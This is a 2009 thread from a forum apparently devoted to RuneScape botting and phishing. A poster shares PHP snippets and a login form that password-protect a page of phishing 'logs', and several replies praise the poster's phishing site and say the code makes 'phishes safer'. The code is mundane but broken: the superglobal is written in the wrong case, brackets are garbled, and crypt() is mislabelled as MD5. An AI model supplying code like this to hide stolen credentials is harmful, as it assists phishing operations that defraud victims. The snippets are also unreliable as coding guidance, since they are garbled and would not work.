Ezud.com - Trolling Assistance Forum

Ezud.com - Trolling Assistance Forum (http://ezud.com/forum/index.php)
-   Runescape Botting (http://ezud.com/forum/forumdisplay.php?f=194)
-   -   Simple PHP Password Verifyer (http://ezud.com/forum/showthread.php?t=4363)

Lust 01-21-2009 08:36 PM

Simple PHP Password Verifyer
 
1. This is for your logs. Your logs must be a .php extension.
2. The MD5 encryption is only for paranoids.

First add this to your logs page:
PHP Code:

<?php
$check 
= @$_Post***91;'password'***93;;
if (
$check!="CHANGETHISTOAPASSWORD")
die;
?>

Now your admin.php page:
PHP Code:

<form action="YOURLOGNAME.php" method="post">
Password:<br
<
input type="password" name="password">
<
input type="submit" value="Submit">
</
form

MD5 Encryption, add this to logs page:
PHP Code:

<?php
$check 
= @$_Post***91;'password'***93;;
$check1 crypt($check);
if (
$check1!="CHANGETHISTOAMD5HASH")
die;
?>

On this one change "CHANGETHISTOANMD5HASH" to an md5 encrypted pass. If you don't feel like going to a site, here is an easy way, make some form and then:
PHP Code:

$x $_Post***91;'formname'***93;;
$c crypt($x);
echo 
$c

+rep?

it can be done differently, but this way has less code

Csg999 01-21-2009 09:46 PM

what does this do, sorry i cant read coding too well, thanks

Lust 01-22-2009 02:27 PM

Basically it won't let you see the logs if the password isn't correct.

LinkMaster03 01-22-2009 02:32 PM

Ah so it's pretty much password protection for your logs. Nice one. I'd rep but I have to spread it around.

Lust 01-22-2009 04:54 PM

When I meant it could be done better, I mean without having to actually have another page to access. The only problem the code is a lot longer.

ugojj1818 01-25-2009 04:23 PM

cool thx!!!!

Mr Jr 01-28-2009 05:37 PM

very nice codeing lust im a big fan of ur phishing site ur the best phisher ever :) and i hope we do some projects together your way better that dannt met

Tranquility 01-28-2009 06:08 PM

Quote:

Originally Posted by Mr Jr (Post 44160)
very nice codeing lust im a big fan of ur phishing site ur the best phisher ever :) and i hope we do some projects together your way better that dannt met

Sorry for the flaim but suck up damn....Not saying your bad but still Jesus.

So this basically just codes your phishing files. Which in good turn makes your phishes safer? Very nice +rep.

Edit: Can't add rep sorry, i gotta spread it.

msn 01-29-2009 05:38 PM

Dont really see why you would need this when its as good as having your logs a random name.

icy ice 01-31-2009 06:24 AM

Quote:

Originally Posted by msn (Post 44247)
Dont really see why you would need this when its as good as having your logs a random name.

lol...fail...
http://www.google.lv/search?num=50&h...canner&spell=1

It shows all dictionaries/files...+ search for vulnerabiltys...Hackers usualy use it to find bugs...


All times are GMT -8. The time now is 05:24 PM.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.